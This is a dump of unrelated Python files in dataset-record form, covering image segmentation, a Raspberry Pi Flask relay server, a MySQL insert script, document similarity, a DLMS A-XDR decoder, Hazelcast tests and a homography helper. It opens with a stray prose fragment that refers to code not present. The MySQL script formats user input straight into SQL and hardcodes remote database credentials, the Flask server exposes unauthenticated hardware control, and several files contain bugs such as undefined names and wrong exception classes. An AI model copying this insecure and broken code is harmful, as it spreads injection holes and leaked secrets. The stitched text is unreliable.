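The training loop above hand-rolls class-balanced mini-batches, half positive and half negative per step. The same idea as a standalone NumPy helper (argument names are assumptions mirroring the arrays above):

```python
import numpy as np

def balanced_batch(pos_x, pos_y, neg_x, neg_y, batch_size=128):
    # draw half the batch from each class pool, then shuffle within the batch
    pos_idx = np.random.choice(pos_x.shape[0], batch_size // 2, replace=False)
    neg_idx = np.random.choice(neg_x.shape[0], batch_size // 2, replace=False)
    batch_x = np.vstack((pos_x[pos_idx], neg_x[neg_idx]))
    batch_y = np.vstack((pos_y[pos_idx], neg_y[neg_idx]))
    shuffle = np.random.permutation(batch_x.shape[0])
    return batch_x[shuffle], batch_y[shuffle]
```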
in range(3):\n colormap[:, channel] |= ((ind >> channel) & 1) << shift\n ind >>= 3\n\n return colormap\n\n\ndef label_to_color_image(label):\n \"\"\"Adds color defined by the dataset colormap to the label.\n\n Args:\n label: A 2D array with integer type, storing the segmentation label.\n\n Returns:\n result: A 2D array with floating type. The element of the array\n is the color indexed by the corresponding element in the input label\n to the PASCAL color map.\n\n Raises:\n ValueError: If label is not of rank 2 or its value is larger than color\n map maximum entry.\n \"\"\"\n if label.ndim != 2:\n raise ValueError('Expected 2-D input label')\n\n colormap = create_pascal_label_colormap()\n\n if np.max(label) >= len(colormap):\n raise ValueError('label value too large.')\n\n return colormap[label]\n\n\ndef extract_segment_from_image(image, segment):\n\n \"\"\"Extracts a subimage according to the segmented area\n Args:\n image: A 2D array of RGB integer values that describe\n the original (resized) image.\n\n segment: A 2D array of integer values that describe the\n segmented areas of the image.\n\n Returns:\n return segment_out: A 3D array of RGB integer values that describe\n each of the extracted segments from the original image.\n\n Raises:\n ValueError: If image is not of rank 3 or if segment is not of rank 2\n RunTimeError: If the 2d dimensions of the segment and\n the original image are not the same\n \"\"\"\n if image.ndim != 3:\n raise ValueError('Expected 2-D RGB image')\n if segment.ndim != 2:\n raise ValueError('Expected 2-D segment')\n\n if image.shape[:2] != segment.shape:\n raise RunTimeError('Image and segment are not same size')\n\n unique_segments = np.unique(segment)\n print(unique_segments)\n segment_out_shape = (len(unique_segments), ) + image.shape\n segment_out = np.zeros(segment_out_shape, dtype=np.uint8)\n dim = image.shape[:2]\n percentages_filled = np.zeros(len(unique_segments), dtype=np.float)\n \n for h in range(len(unique_segments)):\n for i in range(image.shape[0]):\n for j in range(image.shape[1]):\n if segment[i][j] == unique_segments[h]:\n segment_out[h][i][j] = image[i][j]\n percentages_filled[h] += 1 \n \n print(\"before: \", percentages_filled)\n print(\"dim: \", dim)\n percentages_filled /= (dim[0] * dim[1])\n print(\"after: \", percentages_filled)\n print(\"sum: \", np.sum(percentages_filled))\n return segment_out, percentages_filled\n","sub_path":"utils/segment.py","file_name":"segment.py","file_ext":"py","file_size_in_byte":3120,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"532447507","text":"from flask import Flask, render_template\nimport datetime\nimport RPi.GPIO as GPIO\nimport tempSensor\n\napp = Flask(__name__)\nGPIO.cleanup()\npin_list = [17,27,22,23]\nGPIO.setmode(GPIO.BCM)\ntry:\n GPIO.setup(pin_list, GPIO.OUT, initial=GPIO.HIGH)\n #GPIO.setup(pin_list, GPIO.HIGH)\nexcept:\n print (\"error: gpio not set up right\")\n GPIO.cleanup()\n GPIO.setup(pin_list, GPIO.OUT, initial=GPIO.HIGH)\nfinally: \n print (\"reached finally\")\n\nsetPoint = 20\n\n@app.route(\"/\")\ndef index():\n #now = datetime.datetime.now()\n #timeString = now.strftime(\"%Y-%m-%d %H:%M\")\n templateData = returnData()\n return render_template('index.html', **templateData)\n\n@app.route(\"/relay/<pin>/\")\ndef relay(pin):\n currentPin = int(pin)\n print (\"relaypowered : \" + str(not GPIO.input(currentPin)))\n if GPIO.input(currentPin):\n GPIO.output(currentPin, GPIO.LOW)\n else:\n GPIO.output(currentPin, GPIO.HIGH)\n # 
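extract_segment_from_image above visits every pixel once per segment in pure Python; boolean masks express the same computation in vectorized NumPy. A hedged equivalent, which also uses the correctly spelled built-in RuntimeError (the code above raises a nonexistent RunTimeError):

```python
import numpy as np

def extract_segments_vectorized(image, segment):
    if image.ndim != 3:
        raise ValueError('Expected 2-D RGB image')
    if segment.ndim != 2:
        raise ValueError('Expected 2-D segment')
    if image.shape[:2] != segment.shape:
        raise RuntimeError('Image and segment are not same size')

    unique_segments = np.unique(segment)
    out = np.zeros((len(unique_segments),) + image.shape, dtype=np.uint8)
    fractions = np.zeros(len(unique_segments))
    for h, seg_id in enumerate(unique_segments):
        mask = segment == seg_id       # (H, W) boolean mask for this segment
        out[h][mask] = image[mask]     # copy only the masked pixels
        fractions[h] = mask.mean()     # fraction of the image this segment fills
    return out, fractions
```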
return \"relaypowered : \" + str(not GPIO.input(currentPin))\n return index()\n \n@app.route('/temperature/<actionType>', methods=[\"GET\"])\ndef button(actionType):\n global setPoint\n if actionType == \"up\": \n setPoint += 1\n elif actionType == \"down\":\n setPoint -= 1\n return render_template(\"index.html\", returnData())\n\n@app.route(\"/exit/\")\ndef exit():\n GPIO.cleanup()\n sys.exit()\n\ndef returnData():\n global setPoint\n templateData = {\n #'title' : 'HELLO!',\n #'time': timeString,\n relay17: not GPIO.input(17),\n relay22: not GPIO.input(22),\n relay23: not GPIO.input(23),\n relay27: not GPIO.input(27),\n temperature: tempSensor.getTemp(\"C\"),\n setPoint: setPoint\n }\n return templateData\n \n\ntry:\n if __name__ == \"__main__\":\n print (\"tempSensor file location: \" + tempSensor.device_file )\n tempSensor.temp_sensor_init()\n print (\"tempSensor file location: \" + tempSensor.device_file)\n temperatures = tempSensor.read_temp()\n print (\"temperature: \" + str(temperatures[0]) + \"C\" + str(temperatures[1]) + \"F\")\n app.run(host='0.0.0.0', port=80, debug=False)\nexcept KeyboardInterrupt:\n print (\"keyboard inturrupt\")\nfinally:\n print (\"exiting with cleanup\")\n GPIO.cleanup()\n\n","sub_path":"flask-gpio.py","file_name":"flask-gpio.py","file_ext":"py","file_size_in_byte":2124,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"11092286","text":"import pymysql\n\n# Open database connection\ndb = pymysql.connect('remotemysql.com', 'g8MjlBGOHf','FMpJJWxnXd','g8MjlBGOHf')\n\n# prepare a cursor object using cursor() method\ncursor = db.cursor()\n\n# Prepare SQL query to INSERT a record into the database.\n\n\ntry:\n nim=input(\"nim = \")\n nama=input (\"nama:\")\n\n sql = \"INSERT INTO mahasiswa (nim, nama) VALUES ('%s', '%s')\" %(nim, nama)\n # Execute the SQL command\n cursor.execute(sql)\n # Commit your changes in the database\n db.commit()\nexcept:\n # Rollback in case there is any error\n db.rollback()\n\n# disconnect from server\ndb.close()","sub_path":"insert.py","file_name":"insert.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"368694994","text":"import docx\nimport PyPDF2\nfrom pathlib import Path\nimport numpy as np\nfrom gensim.models.phrases import Phrases, ENGLISH_CONNECTOR_WORDS\nfrom gensim.models.doc2vec import Doc2Vec\nfrom nltk.tokenize import word_tokenize, sent_tokenize\n\n\ndef cosineSimilarity(A, B):\n return np.dot(A, B)/(np.linalg.norm(A)*np.linalg.norm(B))\n\n\ndef phraseTransform(sentences):\n words = list(map(word_tokenize, sentences))\n phrase_model = Phrases(words, min_count=5, threshold=0.5,\n connector_words=ENGLISH_CONNECTOR_WORDS)\n converted_words = [phrase_model[sent] for sent in words]\n converted_sentences = [\" \".join(w) for w in converted_words]\n return converted_sentences\n\n\ndef readDocx(document):\n document = docx.Document(document)\n paragraphs = [para.text.lower() for para in document.paragraphs]\n sentences = list()\n for p in paragraphs:\n sentences.extend(sent_tokenize(p))\n return sentences\n\n\ndef readPDF(document):\n pdfFileObj = open(document, 'rb')\n pdfReader = PyPDF2.PdfFileReader(pdfFileObj)\n pages = [pdfReader.getPage(page).extractText().lower()\n for page in range(pdfReader.numPages)]\n sentences = list()\n for p in pages:\n sentences.extend(sent_tokenize(p))\n return sentences\n\n\ndef readOther(document):\n with open(document) as f:\n content = 
f.read().lower().strip()\n sentences = sent_tokenize(content)\n return sentences\n\n\ndef getText(document):\n p = Path(document)\n extension = p.suffix\n if extension == \".docx\":\n return readDocx(document)\n elif extension == \".pdf\":\n return readPDF(document)\n else:\n return readOther(document)\n\n\ndef createDoc2VecModel(train_text, phrase=False):\n model = Doc2Vec(vector_size=300, window=2, epochs=20, min_count=1, seed=0)\n model.build_vocab(train_text)\n model.train(train_text, total_examples=model.corpus_count, epochs=50)\n return model","sub_path":"src/doc2sim.py","file_name":"doc2sim.py","file_ext":"py","file_size_in_byte":1930,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"417832721","text":"\"\"\"\nA XDR (IEC 61334-6is an Adapted External Data Represerntation Standard\n(XDR for DLMS)\n\nIt usage is for the reduction of APDU sizes and saving bandwidth by eliminating\ndata that is already known to both sender and receiver.\n\nFor example in comparison to BER encoding where the length of data is encoded\nusing A-XDR the lenght byte could be ommited if both sender and receiver are\naware of the lenght of an integer. (2 bytes for example.)\n\nIt is used to encode xDLMS APDUs.\n\nIt is not used for AARQ, AARE, RLRQ, and RLRE. (BER is used)\n\n.. note:\n The InititiateRequest the above requests and responses is an xDLMS APDU and\n uses A-XDR.\n\n\nOptional Values can be omitted by encoding 0x00 in its place. If a value is used\nit should be preceded with 0x01. (0x01+data)\n\nDefault values are encoded with 0x00 if using the default and 0x01+data if\nusing non default.\n\nEncoding integers: A-XDR makes it possible to encode with a fixed range and a\nvariable range.\n\nFixed range integers are encoded with the minimum number of bytes needed to fit\nthe value range.\n\nVariable range integers use the leftmost bit to control the encoding.\nleftmost bit = 0. Value < 128 , value can be encoded in one byte\nleftmost bit = 1. The whole leftmost byte is used to indicate the lenght of the\ninteger data. ex 0b10000010 -> 2 bytes after this is the integer. 0x820xff0xff = 65535\n\n\n\"\"\"\n\nimport attr\nimport typing\nfrom dlms_cosem.protocol.dlms_data import DlmsDataFactory, DlmsData\n\n\ndef decode_variable_integer(bytes_input: bytes):\n \"\"\"\n If the length is fitting in 7 bits it can be encoded in 1 bytes.\n If it is larger then 7 bybitstes the last bit of the first byte indicates\n that the length of the lenght is encoded in the first byte and the length\n is encoded in the following bytes.\n Ex. 0b00000010 -> Length = 2\n Ex 0b100000010, 0b000001111, 0b11111111 -> Lenght = 4095\n :param bytes_input: Input where the variable integer is at the beginning of\n the bytes\n :return: First variable integer the function finds. 
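A hedged end-to-end sketch for the doc2sim helpers above: read two documents, train Doc2Vec on a tagged corpus, and compare inferred vectors with cosineSimilarity. The file names and import path are hypothetical:

```python
from gensim.models.doc2vec import TaggedDocument
from nltk.tokenize import word_tokenize

from doc2sim import getText, createDoc2VecModel, cosineSimilarity  # import path assumed

sents_a = getText("report_a.pdf")    # hypothetical input files
sents_b = getText("report_b.docx")
corpus = [TaggedDocument(word_tokenize(s), [i]) for i, s in enumerate(sents_a + sents_b)]
model = createDoc2VecModel(corpus)

vec_a = model.infer_vector(word_tokenize(" ".join(sents_a)))
vec_b = model.infer_vector(word_tokenize(" ".join(sents_b)))
print(cosineSimilarity(vec_a, vec_b))
```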
and the residual bytes\n \"\"\"\n\n # is the length encoded in single byte or mutliple?\n is_mutliple_bytes = bool(bytes_input[0] & 0b10000000)\n if is_mutliple_bytes:\n length_length = int(bytes_input[0] & 0b01111111)\n length = int(bytes_input[1:(length_length + 1)])\n return length, bytes_input[length_length + 1:]\n\n else:\n length = int(bytes_input[0] & 0b01111111)\n return length, bytes_input[1:]\n\n\n@attr.s\nclass DataSequenceEncoding:\n attribute_name: str = attr.ib()\n\n\nclass AXdrEncoding:\n attribute_name = attr.ib()\n\n\n@attr.s\nclass AttributeEncoding(AXdrEncoding):\n attribute_name: str = attr.ib()\n instance_class = attr.ib()\n return_value = attr.ib(default=False)\n wrap_end = attr.ib(default=False) # Maybe name wrapper?\n length: int = attr.ib(default=None)\n default: any = attr.ib(default=None)\n optional: bool = attr.ib(default=False)\n\n\n@attr.s\nclass SequenceEncoding(AXdrEncoding):\n attribute_name: str = attr.ib()\n instance_factory: DlmsDataFactory = attr.ib(default=DlmsDataFactory)\n\n\n@attr.s\nclass EncodingConf:\n attributes: typing.List[AXdrEncoding] = attr.ib()\n\n\nclass AXdrDecoder:\n\n def __init__(self, encoding_conf):\n\n self.encoding_conf: EncodingConf = encoding_conf\n\n def decode(self, bytes_data: bytes):\n \"\"\"\n return a dict to instantiate the class with\n \"\"\"\n # print(bytes_data)\n in_data = bytes_data[:] # copy so we don't work in the actual data.\n # print(in_data)\n\n out_dict = dict()\n\n for attribute in self.encoding_conf.attributes:\n\n key = attribute.attribute_name\n\n # print(b'To decode' + in_data)\n\n if isinstance(attribute, AttributeEncoding):\n\n data, rest = self._decode_attribute(in_data, attribute)\n\n if attribute.return_value:\n data = data.value\n\n elif isinstance(attribute, SequenceEncoding):\n\n data, rest = self._decode_sequence(in_data, attribute)\n else:\n raise NotImplemented(f'Attribute: {attribute} is not supported')\n\n in_data = rest\n out_dict.update({key: data})\n\n return out_dict\n\n def _decode_attribute(self, in_data, attribute):\n\n #print(b'parsing data: ' + in_data)\n #print(f'Attribute: {attribute}')\n\n first_byte = in_data[0]\n\n if first_byte == 0 and attribute.optional:\n data = None # Should this be a nulldata instead?\n return data, in_data[1:]\n\n elif first_byte == 0 and attribute.default is not None:\n data = attribute.default\n return data, in_data[1:]\n\n elif first_byte == 1 and (attribute.optional or attribute.default):\n # a value is existing and is after the 0x01\n in_data = in_data[1:] # remove the first byte\n\n # Check if length is known.\n if attribute.length:\n attribute_data = in_data[:attribute.length]\n data = attribute.instance_class.from_bytes(attribute_data)\n return data, in_data[attribute.length:]\n\n if attribute.wrap_end:\n attribute_data = in_data\n data = attribute.instance_class.from_bytes(attribute_data)\n return data, b''\n\n # first byte indicates length.\n attribute_data = in_data[1:(first_byte + 1)]\n data = attribute.instance_class.from_bytes(attribute_data)\n return data, in_data[(first_byte + 1):]\n\n def _decode_sequence(self, bytes_data: bytes, attribute):\n in_data = bytes_data[:] # copy so not to mess with initial data\n data_list = list()\n\n while in_data:\n first_obj, rest = self._get_first(in_data)\n\n data_list.append(first_obj)\n in_data = rest\n\n return data_list, in_data\n\n def _get_tag(self, bytes_data: bytes):\n return bytes_data[0]\n\n def _get_length(self, tag, bytes_data):\n \"\"\"\n If we know the length of the data it will not be 
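Two details of decode_variable_integer above are worth flagging: calling int() on a raw bytes slice parses ASCII digits rather than big-endian bytes, and the multi-byte bit patterns in the docstring example are garbled. A hedged round-trip sketch of the scheme the module docstring describes:

```python
def encode_variable_integer(value: int) -> bytes:
    if value < 0x80:
        return bytes([value])                        # fits in 7 bits, single byte
    payload = value.to_bytes((value.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(payload)]) + payload    # first byte carries the length

def decode_variable_integer_fixed(data: bytes):
    if data[0] & 0b10000000:
        n = data[0] & 0b01111111
        return int.from_bytes(data[1:n + 1], "big"), data[n + 1:]
    return data[0] & 0b01111111, data[1:]

# 4095 -> 0x82 0x0F 0xFF, matching the docstring's intent
assert decode_variable_integer_fixed(encode_variable_integer(4095)) == (4095, b"")
```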
encoded. But it the data is\n of a type where the length cannot be predetermined we need to decode the\n lenght. This is done by the same way the DLMS way to encode and decode\n variable integers\n\n \"\"\"\n data_cls = DlmsDataFactory.get_data_class(tag)\n if data_cls.LENGTH is None:\n length, rest = decode_variable_integer(bytes_data[1:])\n return length, rest\n\n else:\n return data_cls.LENGTH, bytes_data[1:]\n\n def _get_tag_length_value(self, bytes_data: bytes):\n\n tag = self._get_tag(bytes_data)\n length, rest = self._get_length(tag, bytes_data)\n value = rest[:length]\n rest = rest[length:]\n return tag, length, value, rest\n\n def _get_first(self, bytes_data: bytes):\n\n tag, length, value, rest = self._get_tag_length_value(bytes_data)\n\n data_cls = DlmsDataFactory.get_data_class(tag)\n\n data = data_cls(value, length=length)\n\n return data, rest\n\n def encode(self, to_encode):\n raise NotImplemented('Encoding objects to A-XDR is not yet supported.')\n\n\nclass DlmsDataToPythonConverter:\n\n def __init__(self, encoding_conf: typing.List[DlmsData]):\n self.encoding_conf = encoding_conf\n\n def to_python(self):\n out_list = list()\n for item in self.encoding_conf:\n out_list.append(item.value)\n\n return out_list\n\n def to_dlms(self, data: typing.List):\n raise NotImplemented(\n 'Not yet supported to convert python values to DLMS')\n","sub_path":"dlms_cosem/protocol/a_xdr.py","file_name":"a_xdr.py","file_ext":"py","file_size_in_byte":7610,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"116191116","text":"import binascii\n\nfrom hazelcast import six\nfrom hazelcast.core import HazelcastJsonValue\nfrom hazelcast.config import SerializationConfig, INTEGER_TYPE\nfrom hazelcast.serialization.data import Data\nfrom hazelcast.serialization.serialization_const import CONSTANT_TYPE_DOUBLE\nfrom hazelcast.serialization.service import SerializationServiceV1\nfrom tests.base import SingleMemberTestCase\nfrom tests.hzrc.ttypes import Lang\n\n\nclass SerializersTestCase(SingleMemberTestCase):\n def setUp(self):\n config = SerializationConfig()\n config.default_integer_type = INTEGER_TYPE.BIG_INT\n self.service = SerializationServiceV1(serialization_config=config)\n\n def tearDown(self):\n self.service.destroy()\n\n def test_none_serializer(self):\n none = None\n data_n = self.service.to_data(none)\n self.assertIsNone(data_n)\n self.assertIsNone(self.service.to_object(Data()))\n\n def test_boolean_serializer(self):\n true = True\n false = False\n data_t = self.service.to_data(true)\n data_f = self.service.to_data(false)\n\n obj_t = self.service.to_object(data_t)\n obj_f = self.service.to_object(data_f)\n self.assertEqual(true, obj_t)\n self.assertEqual(false, obj_f)\n\n def test_char_type_serializer(self):\n buff = bytearray(binascii.unhexlify(\"00000000fffffffb00e7\"))\n data = Data(buff)\n obj = self.service.to_object(data)\n self.assertEqual(six.unichr(0x00e7), obj)\n\n def test_float(self):\n buff = bytearray(binascii.unhexlify(\"00000000fffffff700000000\"))\n data = Data(buff)\n obj = self.service.to_object(data)\n self.assertEqual(0.0, obj)\n\n def test_double(self):\n double = 1.0\n data = self.service.to_data(double)\n obj = self.service.to_object(data)\n self.assertEqual(data.get_type(), CONSTANT_TYPE_DOUBLE)\n self.assertEqual(double, obj)\n\n def test_datetime(self):\n year = 2000\n month = 11\n day = 15\n hour = 23\n minute = 59\n second = 49\n script = \"\"\"\nfrom java.util import Date, Calendar\ncal = 
Calendar.getInstance()\ncal.set({}, ({}-1), {}, {}, {}, {})\nresult=instance_0.getSerializationService().toBytes(cal.getTime())\n\"\"\".format(year, month, day, hour, minute, second)\n response = self.rc.executeOnController(self.cluster.id, script, Lang.PYTHON)\n data = Data(response.result)\n val = self.service.to_object(data)\n self.assertEqual(year, val.year)\n self.assertEqual(month, val.month)\n self.assertEqual(day, val.day)\n self.assertEqual(hour, val.hour)\n self.assertEqual(minute, val.minute)\n self.assertEqual(second, val.second)\n\n def test_hazelcast_json_vale(self):\n json_value = HazelcastJsonValue('{\"key\": \"value\"}')\n json_data = self.service.to_data(json_value)\n json_deserialized = self.service.to_object(json_data)\n self.assertEqual(json_value.to_string(), json_deserialized.to_string())\n\n def test_big_int_small(self):\n self._big_int_test(12)\n\n def test_big_int_small_neg(self):\n self._big_int_test(-13)\n\n def test_big_int(self):\n self._big_int_test(1234567890123456789012345678901234567890)\n\n def test_big_int_neg(self):\n self._big_int_test(-1234567890123456789012345678901234567890)\n\n def _big_int_test(self, big_int):\n script = \"\"\"from java.math import BigInteger\nresult=instance_0.getSerializationService().toBytes(BigInteger(\"{}\",10))\"\"\".format(big_int)\n response = self.rc.executeOnController(self.cluster.id, script, Lang.PYTHON)\n data = Data(response.result)\n val = self.service.to_object(data)\n data_local = self.service.to_data(big_int)\n \n self.assertEqual(binascii.hexlify(data._buffer), binascii.hexlify(data_local._buffer))\n self.assertEqual(big_int, val)\n","sub_path":"tests/serialization/serializers_test.py","file_name":"serializers_test.py","file_ext":"py","file_size_in_byte":3911,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"111021125","text":"import math\r\n\r\nfrom FabricEngine.SceneGraph.Nodes.Rendering import *\r\nfrom FabricEngine.SceneGraph.Nodes.Images import *\r\nfrom FabricEngine.SceneGraph.PySide import *\r\n\r\nfrom FabricEngine.SceneGraph.Nodes.Geometry.PointsImpl import Points\r\n\r\n\r\nSUPPORTED_SAMPLERS = [\"Poisson\", \"Jittered\", \"Grid\", \"Random\"]\r\n\r\nclass Samples(Points):\r\n \"\"\"A specialized cube polygon mesh node\"\"\"\r\n \r\n def __init__(self, scene, **kwargs): \r\n # call the baseclass constructor\r\n super(Samples, self).__init__(scene, **kwargs)\r\n\r\n dgNode = self.getGeometryDGNode()\r\n dgNode.addMember('distribution', 'Integer', 0)\r\n dgNode.addMember('numSamples', 'Integer', 512)\r\n dgNode.addMember('seed', 'Size', 0)\r\n\r\n self.addMemberParameter(dgNode, 'distribution', True, uiCombo=[{'label': key, 'value': value} for value, key in enumerate(SUPPORTED_SAMPLERS)])\r\n self.addMemberParameter(dgNode, 'numSamples', True, uiRange=Vec2(1, 2048))\r\n self.addMemberParameter(dgNode, 'seed', True, uiRange=Vec2(0, 50))\r\n\r\n self.bindDGOperator(dgNode.bindings,\r\n name = 'SamplesGenerate', \r\n fileName = FabricEngine.SceneGraph.buildAbsolutePath('SamplesGenerate.kl'), \r\n layout = [\r\n 'self.points',\r\n 'self.distribution',\r\n 'self.numSamples',\r\n 'self.seed'\r\n ],\r\n )\r\n\r\nSamples.registerNodeClass('Samples')\r\n\r\nclass SamplerApp(SceneGraphApplication):\r\n \r\n def __init__(self):\r\n\r\n os.environ[\"FABRIC_EXTS_PATH\"] = \"/Library/FabricEngine/1.12.0/Exts:/Users/alexanderwilkie/dev/fabric/Exts:/Users/alexanderwilkie/dev/fabric/Samplers\"\r\n \r\n super(SamplerApp, self).__init__()\r\n\r\n width = 512\r\n height 
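Concerning the big-integer round trip tested above: Python can reproduce the minimal two's-complement payload that java.math.BigInteger.toByteArray() emits, which is what the byte-for-byte comparison relies on. A hedged sketch (the serializer's surrounding type/length framing is not shown):

```python
def bigint_to_bytes(value: int) -> bytes:
    # minimal two's-complement length: one sign bit on top of the magnitude bits
    length = (value + (value < 0)).bit_length() // 8 + 1
    return value.to_bytes(length, "big", signed=True)

assert bigint_to_bytes(12) == b"\x0c"
assert bigint_to_bytes(-13) == b"\xf3"
assert int.from_bytes(bigint_to_bytes(-13), "big", signed=True) == -13
```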
= 512\r\n\r\n self.setWindowTitle(\"Scene Graph Sampler Browser\")\r\n self.resize(width*2, height)\r\n self.setupViewports(useBackgroundTexture=False)\r\n self.setupCamera(cameraPosition=Vec3(0.001, 30, 0), cameraNearDistance=0.1, cameraFarDistance=1000.0, setupCameraManipulator=False)\r\n self.setupGrid(gridSize=width)\r\n\r\n scene = self.getScene()\r\n points = Samples(scene)\r\n\r\n xfo = Xfo(tr=Vec3(-width/2.0, 0.0, -height/2.0));\r\n pointsInstance = GeometryInstance(\r\n scene,\r\n geometry=points,\r\n transform=Transform(scene, parentTransform=Transform(scene), localXfo=xfo),\r\n material=Material(scene, xmlFile='FlatPointsMaterial', color=Color(1.0, 0.0, 0.0))\r\n )\r\n\r\n nodesList = {\r\n 'instance': pointsInstance\r\n }\r\n self.getViewport().getInPort('Camera').getConnectedNode().fitInView(nodesList)\r\n self.rotateCamera(degrees=270)\r\n self.addDockWidget(QtCore.Qt.RightDockWidgetArea, SGNodeInspectorDockWidget(node=points)) \r\n\r\n self.constructionCompleted()\r\n\r\n def rotateCamera(self, degrees):\r\n camXfo = self.getViewport().getInPort('Camera').getConnectedNode().getInPort('Transform').getConnectedNode().getParameter('globalXfo')\r\n camXfo.setValue(Xfo(camXfo.getValue().tr, Quat().setFromAxisAndAngle(Vec3(0.0, 1.0, 0.0), math.radians(degrees))))\r\n\r\nif __name__ == '__main__':\r\n app = SamplerApp()\r\n app.exec_()\r\n","sub_path":"Viewer.py","file_name":"Viewer.py","file_ext":"py","file_size_in_byte":3031,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"434543574","text":"from enum import Enum\nimport numpy as np\n\nfrom bof_slot_tagger.slot_tagger import InferModel\n\n\nclass Bof_Nlu:\n def __init__(self):\n self.entities = {\n '<area>': None,\n '<food>': None,\n '<price>': None\n }\n \n self.num_features = 3\n self.rating = None\n \n self.nlu_model = InferModel()\n \n self.EntType = Enum('Entity Type', '<area> <food> <price> <non_ent>')\n\n def init_entities(self):\n self.entities = {\n '<area>': None,\n '<food>': None,\n '<price>': None\n }\n\n def ent_type(self, ent):\n if ent == 'B-area':\n return self.EntType['<area>'].name\n elif ent == 'B-food':\n return self.EntType['<food>'].name\n elif ent == 'B-price':\n return self.EntType['<price>'].name\n else:\n return None\n\n def extract_entities(self, utterance, update=True):\n tokenized = []\n word_list = utterance.split(' ')\n slot_tagging_result = self.nlu_model.inference(utterance)\n \n # print(slot_tagging_result)\n \n for i, tag in enumerate(slot_tagging_result):\n entity = self.ent_type(tag)\n if update and entity:\n self.entities[entity] = word_list[i]\n tokenized.append(entity)\n elif entity:\n tokenized.append(entity)\n else:\n tokenized.append(word_list[i])\n \n return ' '.join(tokenized)\n\n def context_features(self):\n keys = list(set(self.entities.keys()))\n self.ctxt_features = np.array([bool(self.entities[key]) for key in keys],\n dtype=np.float32)\n \n return self.ctxt_features","sub_path":"modules/bof_nlu.py","file_name":"bof_nlu.py","file_ext":"py","file_size_in_byte":1778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"228747210","text":"from django.conf.urls import url\n\nfrom app.views import (\n DefaultFormByFieldView,\n DefaultFormsetView,\n DefaultFormView,\n FormHorizontalView,\n FormInlineView,\n FormWithFilesView,\n HomePageView,\n MiscView,\n PaginationView,\n)\n\nurlpatterns = [\n url(r\"^$\", HomePageView.as_view(), name=\"home\"),\n url(r\"^formset$\", 
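extract_entities above keeps the token under each B-* slot tag. The same mapping as a self-contained function, with a made-up utterance and tag sequence for illustration:

```python
def tags_to_entities(words, tags):
    # map BIO slot tags onto the tokens they cover (single-token slots, as above)
    mapping = {"B-area": "<area>", "B-food": "<food>", "B-price": "<price>"}
    entities = {}
    for word, tag in zip(words, tags):
        if tag in mapping:
            entities[mapping[tag]] = word
    return entities

words = "cheap thai food in the north".split()
tags = ["B-price", "B-food", "O", "O", "O", "B-area"]
print(tags_to_entities(words, tags))
# {'<price>': 'cheap', '<food>': 'thai', '<area>': 'north'}
```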
DefaultFormsetView.as_view(), name=\"formset_default\"),\n url(r\"^form$\", DefaultFormView.as_view(), name=\"form_default\"),\n url(r\"^form_by_field$\", DefaultFormByFieldView.as_view(), name=\"form_by_field\"),\n url(r\"^form_horizontal$\", FormHorizontalView.as_view(), name=\"form_horizontal\"),\n url(r\"^form_inline$\", FormInlineView.as_view(), name=\"form_inline\"),\n url(r\"^form_with_files$\", FormWithFilesView.as_view(), name=\"form_with_files\"),\n url(r\"^pagination$\", PaginationView.as_view(), name=\"pagination\"),\n url(r\"^misc$\", MiscView.as_view(), name=\"misc\"),\n]\n","sub_path":"example/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":920,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"114094654","text":"import cv2 as cv2\nimport numpy as np\nfrom scipy.spatial import Delaunay\nimport matplotlib.pyplot as plt\n\ndef rectify(img_gray, corners):\n\n desired_corners = np.array([[0,0],[128, 0], [128, 128] ,[0, 128]], dtype=np.float32)\n H = find_svd(corners, desired_corners)\n shape = [128, 128]\n rect_img = getPerspectiveTransform(img_gray,H, shape)\n \n return rect_img\n\ndef warp_lena(img, img_lena, corners):\n\n desired_corners = np.array([[0,0],[img_lena.shape[0], 0], [img_lena.shape[0], img_lena.shape[0]] ,[0, img_lena.shape[0]]], dtype=np.float32)\n H = find_svd(corners, desired_corners)\n shape = [img_lena.shape[0],img_lena.shape[0]]\n warped_img = getPerspectiveTransform_Lena(img,img_lena, H, shape)\n return warped_img\n\ndef find_cube_pts(img, reqdPts, corners, shape, calib):\n\n desired_corners = np.array([[0, 0],[0, shape[1]],[shape[0], shape[1]], [shape[0], 0]])\n H = find_svd(corners, desired_corners)\n H = np.linalg.inv(H)\n H = H/H[2,2]\n E = np.zeros([3, 4])\n calib_inv = np.linalg.inv(calib)\n E_ = np.matmul(calib_inv, H)\n lamda = (np.linalg.norm(np.matmul(calib_inv, H[:, 0])) + np.linalg.norm(np.matmul(calib_inv, H[:, 1])))/2\n B = np.linalg.det(E_)\n \n if B < 0:\n E_ = -E_\n\n E_ = E_/lamda\n E[:,0] = (E_[:,0]/lamda).T\n E[:,1] = (E_[:,1]/lamda).T\n E[:,2] = (np.cross(E[:,0], E[:,1])*lamda).T\n E[:,3] = (E_[:,2]/lamda).T\n E = E[:]/E[2,3]\n imgPts = np.matmul(calib,np.matmul(E,reqdPts.T))\n \n return imgPts\n\n\ndef find_svd(c1,c2):\n\n [x1,y1],[x2,y2],[x3,y3],[x4,y4] = c2\n [xp1, yp1], [xp2, yp2], [xp3, yp3], [xp4, yp4] = c1\n A = np.array([[-x1,-y1,-1,0,0,0,x1*xp1,y1*xp1,xp1],[0,0,0,-x1,-y1,-1,x1*yp1,y1*yp1,yp1],[-x2,-y2,-1,0,0,0,x2*xp2,y2*xp2,xp2],\\\n [0,0,0,-x2,-y2,-1,x2*yp2,y2*yp2,yp2],[-x3,-y3,-1,0,0,0,x3*xp3,y3*xp3,xp3],[0,0,0,-x3,-y3,-1,x3*yp3,y3*yp3,yp3],\\\n 